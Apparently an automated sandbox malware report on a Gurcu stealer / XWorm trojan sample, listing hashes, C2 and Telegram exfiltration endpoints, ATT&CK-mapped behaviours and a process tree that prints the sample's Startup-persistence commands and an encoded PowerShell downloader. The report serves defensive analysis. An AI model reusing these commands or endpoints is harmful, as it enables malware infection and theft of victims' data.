gurcu | 31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad

Analysis

max time kernel
136s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-10-2024 10:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe
Size

2.1MB
MD5

8c04e5d5adaf15173fecd9384ceda14d
SHA1

9cbcf5134cfecb1a1f0c7e615a2a973ed8381e54
SHA256

31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad
SHA512

7616ce8a0728abedb084c516b47fe45b7af264458d9fa4edccebbd2f8e77fbc17a703f06e8e23b9c618a45176a6073f6a5b0727619adf30f620eac062d58c0fe
SSDEEP

24576:X40Bg3buy6rMn3I5bF2Wlo7XGc6okgFZ5A1WqJlLsYpd+wyQn652pBJTu:DCruyinbFOR6PgFZmMqJ19pd+wpXa

Score

10^/10

gurcu xworm discovery execution persistence rat stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

exe.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

exe.dropper

https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20

Extracted

Family

xworm

Version

5.0

172.214.220.82:5555

Mutex

XjG17XjAty4BSeG3

Attributes

Install_directory
%LocalAppData%
install_file
sys32.exe
telegram
https://api.telegram.org/bot7375017271:AAEAqNiylxrFjGgvlGU0if1BBlKDJQLHYkw

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7375017271:AAEAqNiylxrFjGgvlGU0if1BBlKDJQLHYkw/sendMessage?chat_id=-4592360412

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2276-199-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 8 IoCs

flow	pid	Process
23	448	wscript.exe
24	2236	wscript.exe
25	448	wscript.exe
26	2236	wscript.exe
38	3716	powershell.exe
39	3372	powershell.exe
41	3716	powershell.exe
42	3372	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3360	powershell.exe
2604	powershell.exe
3844	powershell.exe
3816	powershell.exe
3716	powershell.exe
3372	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys64.js.bat	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	wscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	wscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys32.lnk	AppLaunch.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys32.lnk	AppLaunch.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys32.js.bat	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\certeiramente.js"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\latinas.js"	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3372 set thread context of 2276	3372	powershell.exe	122
PID 3716 set thread context of 2660	3716	powershell.exe	123

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2368	PING.EXE
2340	cmd.exe
2824	cmd.exe
2032	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2032	PING.EXE
2368	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2604	powershell.exe
2604	powershell.exe
3360	powershell.exe
3360	powershell.exe
2604	powershell.exe
3360	powershell.exe
3844	powershell.exe
3844	powershell.exe
3844	powershell.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3816	powershell.exe
3816	powershell.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3716	powershell.exe
3716	powershell.exe
3816	powershell.exe
3716	powershell.exe
3372	powershell.exe
3372	powershell.exe
3372	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	3360	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	3816	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeDebugPrivilege	2276	AppLaunch.exe
Token: SeDebugPrivilege	2660	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3064	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe
3064	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1072 wrote to memory of 4508	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	86
PID 1072 wrote to memory of 4508	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	86
PID 4508 wrote to memory of 3064	4508	cmd.exe	88
PID 4508 wrote to memory of 3064	4508	cmd.exe	88
PID 4508 wrote to memory of 3064	4508	cmd.exe	88
PID 1072 wrote to memory of 448	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	90
PID 1072 wrote to memory of 448	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	90
PID 1072 wrote to memory of 2904	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	91
PID 1072 wrote to memory of 2904	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	91
PID 1072 wrote to memory of 2236	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	92
PID 1072 wrote to memory of 2236	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	92
PID 1072 wrote to memory of 3836	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	94
PID 1072 wrote to memory of 3836	1072	31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe	94
PID 3064 wrote to memory of 3588	3064	AcroRd32.exe	96
PID 3064 wrote to memory of 3588	3064	AcroRd32.exe	96
PID 3064 wrote to memory of 3588	3064	AcroRd32.exe	96
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 4048	3588	RdrCEF.exe	97
PID 3588 wrote to memory of 920	3588	RdrCEF.exe	98
PID 3588 wrote to memory of 920	3588	RdrCEF.exe	98
PID 3588 wrote to memory of 920	3588	RdrCEF.exe	98
PID 3588 wrote to memory of 920	3588	RdrCEF.exe	98
PID 3588 wrote to memory of 920	3588	RdrCEF.exe	98
PID 3588 wrote to memory of 920	3588	RdrCEF.exe	98
PID 3588 wrote to memory of 920	3588	RdrCEF.exe	98

C:\Users\Admin\AppData\Local\Temp\31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe
"C:\Users\Admin\AppData\Local\Temp\31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad.exe"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Windows\system32\cmd.exe
  "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4508
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3588
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3B2B69837522DE28B7C58E231CCD96C4 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4048
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F2FF6B5E7C48385DBDD16FDAE2E1817E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F2FF6B5E7C48385DBDD16FDAE2E1817E --renderer-client-id=2 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:920
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1736BA228653852FC220DA07DDC60589 --mojo-platform-channel-handle=2348 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1076
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4781C764C764EE34E293AA4EF70AC9ED --mojo-platform-channel-handle=2540 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4156
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=38BFCFC75B0CA2FCABE93DABEBF40B96 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=38BFCFC75B0CA2FCABE93DABEBF40B96 --renderer-client-id=6 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2128
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DFCFD0FB0648B813A68646B80E2DD7FB --mojo-platform-channel-handle=2688 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3104
- C:\Windows\system32\wscript.exe
  "wscript.exe" C:\Users\Public\Documents\sys32.js
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Drops startup file
  PID:448
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys32.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2824
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys32.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJAB2AGUAUgBiAG8AUwBFAHAAcgBFAEYARQByAGUAbgBDAGUALgBUAE8AUwB0AHIAaQBOAGcAKAApAFsAMQAsADMAXQArACcAWAAnAC0ASgBvAEkATgAnACcAKQAoACAAKAAoACcAMABUAFkAaQBtAGEAZwBlAFUAcgBsACAAPQAgADcASwBFAGgAdAB0AHAAcwAnACsAJwA6AC8ALwBpAGEANgAwADAAMQAwADEALgB1ACcAKwAnAHMALgBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwAxAC8AaQB0AGUAbQBzAC8AZABlAHQAYQBoAC0AbgBvAHQAZQAtAGoAXwAyADAAMgA0ADEAMAAvAEQAZQB0AGEAaABOAG8AdABlAF8ASgAuAGoAJwArACcAcABnACAANwAnACsAJwBLAEUAOwAwAFQAWQB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAMABUAFkAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAwAFQAWQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3ACcAKwAnAG4AbABvAGEAZAAnACsAJwBEAGEAdABhACgAMABUAFkAaQBtAGEAZwBlAFUAcgBsACkAOwAwAFQAWQBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQAnACsAJwBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAwAFQAWQBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAwAFQAJwArACcAWQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAA3AEsARQA8ADwAQgAnACsAJwBBAFMARQA2ADQAX